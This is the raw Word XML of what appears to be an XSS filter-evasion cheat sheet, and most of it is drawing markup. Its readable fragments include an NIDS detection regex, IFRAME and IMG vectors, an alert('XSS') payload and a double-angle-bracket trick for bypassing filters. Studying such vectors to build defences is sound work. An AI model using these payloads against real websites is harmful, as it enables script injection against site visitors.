                <v:shape id="Text Box 1254" o:spid="_x0000_s1184" type="#_x0000_t202" style="position:absolute;left:2513;top:1;width:4958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QmR8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86aZipaZZRUoLQqE0xoPHMTtJ&#10;FrOzaXbV+O/dQqG3ebzPydaDbcWFem8cK3iaJiCIS6cN1wr2xcfkBYQPyBpbx6TgRh7Wq4dRhql2&#10;V87psgu1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zGcNvKWZIspEXDsaHBjt4aKk+7s1Ww&#10;OXD+bn6+jt95lZuiWCb8uTgpNX4cNq8gAg3hX/zn3uo4f/Y8h99v4gl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UJkf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2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/((\\%3D)|(=))\[^\\n\]\*((\\%3C)|\&lt;)\[^\\n\]+((\\%3E)|\&gt;)/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NIDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>regex:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>because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doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>require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end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8471"/>
        </w:tabs>
        <w:spacing w:before="75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56576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5862320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1249" name="Group 1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9232" y="81"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1250" name="Freeform 1252"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="9232" y="81"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9867 9232"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 9254 9232"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 9250 9232"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 9232 9232"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 9232 9232"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 9232 9232"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 9254 9232"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9867 9232"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9889 9232"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9889 9232"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9871 9232"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9867 9232"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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2"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="635" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="657" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="657" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="639" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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" name="Text Box 1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32" y="81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1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IFRAME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50" o:spid="_x0000_s1185" style="position:absolute;left:0;text-align:left;margin-left:461.6pt;margin-top:4.05pt;width:32.85pt;height:9.15pt;z-index:-17659904;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="9232,81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">
                <v:shape id="Freeform 1252" o:spid="_x0000_s1186" style="position:absolute;left:9232;top:81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O9zcYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UK3upuA1qbuooIgmJ7aFrB45Cd&#10;JqHZ2ZBdNf77zkHwNsN789438+XgW3WmPjaBLbyMDSjiMriGKws/35vnGaiYkB22gcnClSIsF48P&#10;c8xduPAXnYtUKQnhmKOFOqUu1zqWNXmM49ARi/Ybeo9J1r7SrseLhPtWZ8ZMtceGpaHGjtY1lX/F&#10;yVtIxexgslj6Cs1H3H9m+93x7dXa0dOwegeVaEh38+166wQ/mwi/fCMj6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O9zcYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m635,182r-613,l18,182,,161r,-3l,21,22,,635,r22,21l657,161r-18,21l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,263;22,263;18,263;0,242;0,239;0,102;22,81;635,81;657,102;657,242;639,263;635,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1251" o:spid="_x0000_s1187" type="#_x0000_t202" style="position:absolute;left:9232;top:81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OF38MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TRUUrUaRRWFBWLZ2D3scm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCr7yw2gBwgdkjbVjUvAgD9tNv7fGVLs7&#10;Z3Q7hVLEEPYpKqhCaFIpfVGRRT92DXHkLq61GCJsS6lbvMdwW8tpksylRcOxocKG3ioqrqdfq2D3&#10;zdne/HycP7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fzib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OF38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1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IFRAME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side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>note,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affective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>against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real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filter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came</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>across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open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ended</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1601"/>
        </w:tabs>
        <w:spacing w:before="75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57088" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1657985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="262890" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1246" name="Group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890" cy="116205"/>
                          <a:chOff x="2611" y="81"/>
                          <a:chExt cx="414" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1247" name="Freeform 1249"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2610" y="81"/>
                            <a:ext cx="414" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3003 2611"/>
                              <a:gd name="T1" fmla="*/ T0 w 414"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 2632 2611"/>
                              <a:gd name="T5" fmla="*/ T4 w 414"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2629 2611"/>
                              <a:gd name="T9" fmla="*/ T8 w 414"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2611 2611"/>
                              <a:gd name="T13" fmla="*/ T12 w 414"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2611 2611"/>
                              <a:gd name="T17" fmla="*/ T16 w 414"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2611 2611"/>
                              <a:gd name="T21" fmla="*/ T20 w 414"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 2632 2611"/>
                              <a:gd name="T25" fmla="*/ T24 w 414"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3003 2611"/>
                              <a:gd name="T29" fmla="*/ T28 w 414"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3024 2611"/>
                              <a:gd name="T33" fmla="*/ T32 w 414"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3024 2611"/>
                              <a:gd name="T37" fmla="*/ T36 w 414"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3006 2611"/>
                              <a:gd name="T41" fmla="*/ T40 w 414"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3003 2611"/>
                              <a:gd name="T45" fmla="*/ T44 w 414"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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4" h="183">
                                <a:moveTo>
                                  <a:pt x="392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92" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39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" name="Text Box 1248"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2610" y="81"/>
                            <a:ext cx="41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&lt;IMG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7" o:spid="_x0000_s1188" style="position:absolute;left:0;text-align:left;margin-left:130.55pt;margin-top:4.05pt;width:20.7pt;height:9.15pt;z-index:-17659392;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2611,81" coordsize="41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">
                <v:shape id="Freeform 1249" o:spid="_x0000_s1189" style="position:absolute;left:2610;top:81;width:414;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="41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9OusYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBCF74L/IYzgbU0tsivVKCq7WERYVj14HJqx&#10;LTaT0kRb//1GELzN8N735s182ZlK3KlxpWUF41EEgjizuuRcwen48zEF4TyyxsoyKXiQg+Wi35tj&#10;om3Lf3Q/+FyEEHYJKii8rxMpXVaQQTeyNXHQLrYx6MPa5FI32IZwU8k4ij6lwZLDhQJr2hSUXQ83&#10;E2rc9o9j2u7reL3dfW9O59TvfidKDQfdagbCU+ff5hed6sDFky94fhNGk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U9OusYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m392,182r-371,l18,182,,161r,-3l,21,21,,392,r21,21l413,161r-18,21l392,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="392,263;21,263;18,263;0,242;0,239;0,102;21,81;392,81;413,102;413,242;395,263;392,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1248" o:spid="_x0000_s1190" type="#_x0000_t202" style="position:absolute;left:2610;top:81;width:41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6n8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UK3upGEanRVaS0IBSkMR56nGbH&#10;ZDE7m2ZXTf+9cyj0NsN78943q83gW3WlPrrABibjDBRxFazj2sCxfH9+ARUTssU2MBn4pQib9ePD&#10;CnMbblzQ9ZBqJSEcczTQpNTlWseqIY9xHDpi0U6h95hk7Wtte7xJuG/1NMvm2qNjaWiwo9eGqvPh&#10;4g1sv7h4cz/778/iVLiyXGT8MT8bM3oatktQiYb0b/673lnBn84EV76REf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C6n8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&lt;IMG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instead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an</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>tag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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1057275" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1243" name="Group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7275" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="1665" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1244" name="Freeform 1246"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="1665" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3279 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 1665"/>
                              <a:gd name="T2" fmla="+- 0 261 240"/>
                              <a:gd name="T3" fmla="*/ 261 h 183"/>
                              <a:gd name="T4" fmla="+- 0 3258 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 1665"/>
                              <a:gd name="T6" fmla="+- 0 240 240"/>
                              <a:gd name="T7" fmla="*/ 240 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2547 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 1665"/>
                              <a:gd name="T10" fmla="+- 0 240 240"/>
                              <a:gd name="T11" fmla="*/ 240 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2526 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 1665"/>
                              <a:gd name="T14" fmla="+- 0 261 240"/>
                              <a:gd name="T15" fmla="*/ 261 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2525 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 1665"/>
                              <a:gd name="T18" fmla="+- 0 258 240"/>
                              <a:gd name="T19" fmla="*/ 258 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2505 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 1665"/>
                              <a:gd name="T22" fmla="+- 0 240 240"/>
                              <a:gd name="T23" fmla="*/ 240 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 1665"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 1614 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 1665"/>
                              <a:gd name="T30" fmla="+- 0 261 240"/>
                              <a:gd name="T31" fmla="*/ 261 h 183"/>
                              <a:gd name="T32" fmla="+- 0 1614 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 1665"/>
                              <a:gd name="T34" fmla="+- 0 398 240"/>
                              <a:gd name="T35" fmla="*/ 398 h 183"/>
                              <a:gd name="T36" fmla="+- 0 1614 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 1665"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 1635 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 1665"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2505 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 1665"/>
                              <a:gd name="T46" fmla="+- 0 422 240"/>
                              <a:gd name="T47" fmla="*/ 422 h 183"/>
                              <a:gd name="T48" fmla="+- 0 2526 1614"/>
                              <a:gd name="T49" fmla="*/ T48 w 1665"/>
                              <a:gd name="T50" fmla="+- 0 401 240"/>
                              <a:gd name="T51" fmla="*/ 401 h 183"/>
                              <a:gd name="T52" fmla="+- 0 2526 1614"/>
                              <a:gd name="T53" fmla="*/ T52 w 1665"/>
                              <a:gd name="T54" fmla="+- 0 404 240"/>
                              <a:gd name="T55" fmla="*/ 404 h 183"/>
                              <a:gd name="T56" fmla="+- 0 2547 1614"/>
                              <a:gd name="T57" fmla="*/ T56 w 1665"/>
                              <a:gd name="T58" fmla="+- 0 422 240"/>
                              <a:gd name="T59" fmla="*/ 422 h 183"/>
                              <a:gd name="T60" fmla="+- 0 3258 1614"/>
                              <a:gd name="T61" fmla="*/ T60 w 1665"/>
                              <a:gd name="T62" fmla="+- 0 422 240"/>
                              <a:gd name="T63" fmla="*/ 422 h 183"/>
                              <a:gd name="T64" fmla="+- 0 3279 1614"/>
                              <a:gd name="T65" fmla="*/ T64 w 1665"/>
                              <a:gd name="T66" fmla="+- 0 401 240"/>
                              <a:gd name="T67" fmla="*/ 401 h 183"/>
                              <a:gd name="T68" fmla="+- 0 3279 1614"/>
                              <a:gd name="T69" fmla="*/ T68 w 1665"/>
                              <a:gd name="T70" fmla="+- 0 261 240"/>
                              <a:gd name="T71" fmla="*/ 26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665" h="183">
                                <a:moveTo>
                                  <a:pt x="1665" y="21"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1644" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="933" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="911" y="18"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="891" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="891" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="933" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1644" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665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" name="Text Box 1245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39"/>
                            <a:ext cx="166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2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('XSS')"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4" o:spid="_x0000_s1191" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:83.25pt;height:9.15pt;z-index:-15701504;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="166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">
                <v:shape id="Freeform 1246" o:spid="_x0000_s1192" style="position:absolute;left:1614;top:240;width:1665;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="166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6bAcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi9SN1UQpGYjYjWtlAvxuJ5yI7Z&#10;YHY2ZLea/PtuodDbPN7n5OvBtuJGvW8cK3ieJyCIK6cbrhV8nfZPSxA+IGtsHZOCkTysi8lDjpl2&#10;dz7SrQy1iCHsM1RgQugyKX1lyKKfu444chfXWwwR9rXUPd5juG3lIklepMWGY4PBjraGqmv5bRXM&#10;7Ofb6345lqhn74fruTJhlwxKPU6HzQpEoCH8i//cHzrOX6Qp/H4TT5D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umwHEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1665,21l1644,,933,,912,21r-1,-3l891,,21,,,21,,158r,3l21,182r870,l912,161r,3l933,182r711,l1665,161r,-140xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1665,261;1644,240;933,240;912,261;911,258;891,240;21,240;0,261;0,398;0,401;21,422;891,422;912,401;912,404;933,422;1644,422;1665,401;1665,261" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1245" o:spid="_x0000_s1193" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:166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EVAcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86aZipaZZRUoLQqE0xoPHMTtJ&#10;FrOzaXbV+O/dQqG3ebzPydaDbcWFem8cK3iaJiCIS6cN1wr2xcfkBYQPyBpbx6TgRh7Wq4dRhql2&#10;V87psgu1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zGcNvKWZIspEXDsaHBjt4aKk+7s1Ww&#10;OXD+bn6+jt95lZuiWCb8uTgpNX4cNq8gAg3hX/zn3uo4fzZ/ht9v4gl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BFQH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2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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="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('XSS')"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Double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Angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Brackets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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="609"/>
      </w:pPr>
      <w:r>
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bracket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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end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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>instead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close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>angle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bracket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>causes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Gecko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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it,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firefox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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>won't: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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2453640" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1240" name="Group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3640" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="3864" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1241" name="Freeform 1243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3864" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5457 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3864"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
